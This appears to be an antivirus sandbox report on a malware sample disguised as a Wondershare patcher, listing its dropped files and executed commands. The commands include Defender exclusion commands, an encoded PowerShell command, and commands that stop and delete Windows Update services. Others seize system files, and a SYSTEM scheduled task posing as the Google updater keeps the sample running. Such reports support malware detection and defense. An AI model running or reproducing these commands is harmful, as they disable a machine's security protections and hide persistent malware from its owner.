Technical Information
- <SYSTEM32>\tasks\googleupdatetaskmachineqc
- %WINDIR%\explorer.exe
- %TEMP%\is-8rvt5.tmp\<File name>.tmp
- %ProgramFiles%\google\chrome\updater.exe
- %TEMP%\notification_helper.exe
- %TEMP%\is-07co0.tmp
- %TEMP%\is-cd0kq.tmp
- %TEMP%\is-teccq.tmp
- %TEMP%\is-a24es.tmp
- %TEMP%\dup2patcher.dll
- %TEMP%\is-3esl4.tmp\_isetup\_iscrypt.dll
- %TEMP%\is-jtf4d.tmp\coredat.tmp
- <Current directory>\is-t160f.tmp
- %TEMP%\is-7hnba.tmp
- %TEMP%\is-hsvvn.tmp
- %TEMP%\is-ods12.tmp\_isetup\_iscrypt.dll
- %TEMP%\is-ods12.tmp\_isetup\_setup64.tmp
- %TEMP%\is-3esl4.tmp\_isetup\_setup64.tmp
- %ProgramFiles%\google\libs\wr64.sys
- %TEMP%\notification_helper.exe
- %TEMP%\rar.rar
- %TEMP%\wp.txt
- %TEMP%\unrar.exe
- %TEMP%\bat.cmd
- %TEMP%\is-3esl4.tmp\_isetup\_iscrypt.dll
- %TEMP%\is-3esl4.tmp\_isetup\_setup64.tmp
- %TEMP%\is-jtf4d.tmp\coredat.tmp
- from %TEMP%\is-hsvvn.tmp to %TEMP%\coredat.exe
- from %TEMP%\is-7hnba.tmp to %TEMP%\wondershare hosts blocker.cmd
- from <Current directory>\is-t160f.tmp to <Current directory>\wuc patcher.exe
- from %TEMP%\is-a24es.tmp to %TEMP%\rar.rar
- from %TEMP%\is-teccq.tmp to %TEMP%\wp.txt
- from %TEMP%\is-cd0kq.tmp to %TEMP%\unrar.exe
- from %TEMP%\is-07co0.tmp to %TEMP%\bat.cmd
- '%TEMP%\is-8rvt5.tmp\<File name>.tmp' /SL5="$D0018,7132601,834048,<Full path to file>"
- '%TEMP%\coredat.exe' /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART
- '%TEMP%\is-jtf4d.tmp\coredat.tmp' /SL5="$10270,5296611,832512,%TEMP%\coredat.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART
- '%TEMP%\unrar.exe' x -o+ rar.rar -p%o7z%0k7ADcgX0*OfkJH0cVp1t^iC3see&r!p9kj0^6NEX&$z0
- '%TEMP%\notification_helper.exe'
- '%ProgramFiles%\google\chrome\updater.exe'
- '<Current directory>\wuc patcher.exe' /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART
- '%TEMP%\coredat.exe' /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\bat.cmd" /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAG0AbABvACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlS...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"%ProgramFiles%\Google\Chrome\updater.exe\""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c schtasks /run /tn "GoogleUpdateTaskMachineQC"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\Wondershare hosts blocker.cmd" /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART"' (with hidden window)
- '%ProgramFiles%\google\chrome\updater.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\bat.cmd" /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART"
- '%WINDIR%\syswow64\find.exe' /C /I "www.me##a.io" <DRIVERS>\etc\hosts
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
- '%WINDIR%\syswow64\find.exe' /C /I "media.io" <DRIVERS>\etc\hosts
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
- '%WINDIR%\syswow64\find.exe' /C /I "order-api.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "myphone-api.wondershare.cc" <DRIVERS>\etc\hosts
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
- '%WINDIR%\syswow64\find.exe' /C /I "product-api.wondershare.com" <DRIVERS>\etc\hosts
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- '%WINDIR%\syswow64\find.exe' /C /I "api.wondershare.com" <DRIVERS>\etc\hosts
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- '%WINDIR%\syswow64\find.exe' /C /I "cbs.wondershare.cn" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "dc.wondershare.cc" <DRIVERS>\etc\hosts
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
- '<SYSTEM32>\schtasks.exe' /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- '%WINDIR%\syswow64\find.exe' /C /I "accounts.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "www.ke##vid.cc" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "account.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "wae.wondershare.cc.w.cdngslb.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "cloud-api.300624.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "pixcut.wondershare.com.w.kunlunsl.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "pc-api.300624.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "api.300624.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "ori-myphone-download.wondershare.cc" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "myphone-connect.wondershare.cc" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "pop.aimersoft.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "pop.iskysoft.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "a104-123-50-99.deploy.static.akamaitechnologies.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "a104-123-50-16.deploy.static.akamaitechnologies.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "pop.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "f3.34.9905.ip4.static.sl-reverse.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "srv1.keepvid.cc" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "53.90.fd9f.ip4.static.sl-reverse.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "52.90.fd9f.ip4.static.sl-reverse.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "sparrow.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "keepvid.cc" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "cc-antipiracy.wondershare.cc" <DRIVERS>\etc\hosts
- '<SYSTEM32>\schtasks.exe' /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"%ProgramFiles%\Google\Chrome\updater.exe\""
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"%ProgramFiles%\Google\Chrome\updater.exe\""
- '<SYSTEM32>\icacls.exe' <SYSTEM32>\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\WaaSMedicSvc.dll
- '<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- '<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- '<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- '<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- '<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\cmd.exe' /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlS...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAG0AbABvACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionProcess "notification_helper.exe"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
- '<SYSTEM32>\cmd.exe' /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
- '<SYSTEM32>\schtasks.exe' /run /tn "GoogleUpdateTaskMachineQC"
- '%WINDIR%\syswow64\find.exe' /C /I "myphone-download.wondershare.cc" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\Wondershare hosts blocker.cmd" /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART"
- '%WINDIR%\syswow64\find.exe' /C /I "resource.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "statics.was.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "platform.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "cbs.wondershare.net" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "cbs.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "support.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "support.wondershare.net" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "mobilego.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "filmora.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "www.wo####share.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "a104-126-254-40.deploy.static.akamaitechnologies.com" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "www.wo####share.net" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "wondershare.net" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "########### Wondershare Hosts Bloqker ##########" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\find.exe' /C /I "----------------------------------------------------------" <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\takeown.exe' /f "<DRIVERS>\etc\hosts" /a
- '%WINDIR%\syswow64\find.exe' /C /I "antipiracy.wondershare.com" <DRIVERS>\etc\hosts
- '%WINDIR%\explorer.exe' hhaybfagngbzvi0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUwggmG8J29E2P/k1aKEk/6gkQc0eaUCgDrO1N8leQlsMj3Vfwa+3t78s4B8MNJ23k2Bt5s5tXN7eYKTxDtsIejX+H2/rctievEkvk6psxeIXCFXzni...